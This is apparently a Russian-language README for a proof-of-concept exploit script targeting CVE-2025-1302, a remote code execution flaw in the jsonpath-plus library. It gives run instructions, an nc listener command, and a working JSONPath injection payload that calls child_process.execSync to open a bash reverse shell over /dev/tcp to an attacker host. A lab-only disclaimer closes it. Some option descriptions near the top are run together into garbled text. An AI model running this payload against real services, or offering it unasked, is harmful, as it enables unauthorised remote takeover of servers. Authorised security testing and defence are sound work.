
PoC эксплойт и демонстрация уязвимого сервера для CVE-2025-1302 в jsonpath-plus.
Название скрипта PoC: poc.py
Скрипт эксплойта Proof-of-Concept для CVE-2025-1302, который нацелен на уязвимость RCE в библиотеке jsonpath-plus. При запуске против уязвимой конечной точки сервиса скрипт пытается инициировать удаленное выполнение кода через полезную нагрузку JSONPath и установить обратную оболочку обратно к атакующему.
--method или --no-fallback.{ip} и {port}.tqdm.--output.Клонируйте этот репозиторий:
git clone https://github.com/yourorg/jsonpath-rce-poc.git
cd jsonpath-rce-poc
Установите зависимости (требуется Python 3.6+):
pip install -r requirements.txt
Запустите слушатель на вашей атакующей машине (замените порт при необходимости):
nc -lvnp 9999
Запустите PoC:
python3 poc.py \
--url http://TARGET_HOST:PORT/query \
--ip ATTACKER_IP --port 9999 \
[--payload-file payloads.txt] \
[--delay 5] \
[--method AUTO|POST|GET] \
[--no-fallback] \
[--output results.json]
--payload-file: Файл, содержащий одну полезную нагрузку JSONPath на строку. Используйте плейсхолдеры {ip} и {port}.--delay: Секунды ожидания перед отправкой полезных нагрузок (показывает обратный отсчет).--method: Принудительный выбор POST, GET или AUTO (по умолчанию).--no-fallback: Сокращение для пропуска любых повторных попыток GET (эквивалентно --method POST).--output: Путь для сохранения JSON-лога попыток.$[?(@.constructor.constructor("require(\"child_process\").execSync(\"bash -i >& /dev/tcp/{ip}/{port} 0>&1\")")())]
Используйте этот скрипт только в контролируемых лабораторных средах против систем, которыми вы владеете или на тестирование которых имеете явное разрешение. Злоупотребление может быть незаконным и неэтичным.